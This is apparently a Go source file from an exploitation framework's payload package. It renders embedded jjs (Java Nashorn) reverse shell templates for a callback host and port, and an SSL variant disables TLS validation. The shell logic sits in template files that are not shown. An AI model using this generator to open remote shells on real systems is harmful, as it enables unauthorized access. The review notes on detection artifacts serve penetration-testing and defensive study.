package reverse
import (
_ "embed"
"fmt"
"strings"
)
// Embedded jjs script templates. Default uses each one as a fmt.Sprintf format string and
// passes lhost and lport, in that order, as the arguments.
//
// NOTE(review): both variables are exported and mutable, so any importing package can replace
// a template before Default renders it. Confirm that is intended.
var (
	// JJSShell holds the contents of jjs/reverse_shell.jjs, embedded at build time.
	// Default selects it when ssl is false.
	//go:embed jjs/reverse_shell.jjs
	JJSShell string
	// JJSShellSSL holds the contents of jjs/reverse_shell_ssl.jjs, embedded at build time.
	// Default selects it when ssl is true.
	//go:embed jjs/reverse_shell_ssl.jjs
	JJSShellSSL string
)
// Default renders the embedded jjs (Java JavaScript) reverse shell script for the callback
// address lhost:lport and returns it with leading and trailing CR/LF characters trimmed.
// When ssl is true the JJSShellSSL template is rendered, otherwise JJSShell.
//
// The script is an adapted version of Frohoff's original gist, and the logic that disables
// TLS validation was adapted from a blog post by Callan Howell-Pavia. Per the author's notes,
// the script autodetects Windows and provides a 'cmd.exe' shell; otherwise bash is used.
//
// lhost and lport are substituted with fmt.Sprintf and are not escaped or validated here, so
// the caller is responsible for passing a well-formed host and port.
//
// NOTE(review): because the SSL template disables TLS validation, the ssl variant presumably
// encrypts the channel without authenticating the peer. The template is not visible from this
// file, so confirm. For detection engineering, the expected artifact would be a jjs process
// spawning cmd.exe or bash with an outbound connection; verify against the templates.
//
// https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/
// https://gist.github.com/frohoff/8e7c2bf3737032a25051
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string {
	// Pick the template first so the formatting and trimming happen in one place.
	template := JJSShell
	if ssl {
		template = JJSShellSSL
	}

	return strings.Trim(fmt.Sprintf(template, lhost, lport), "\r\n")
}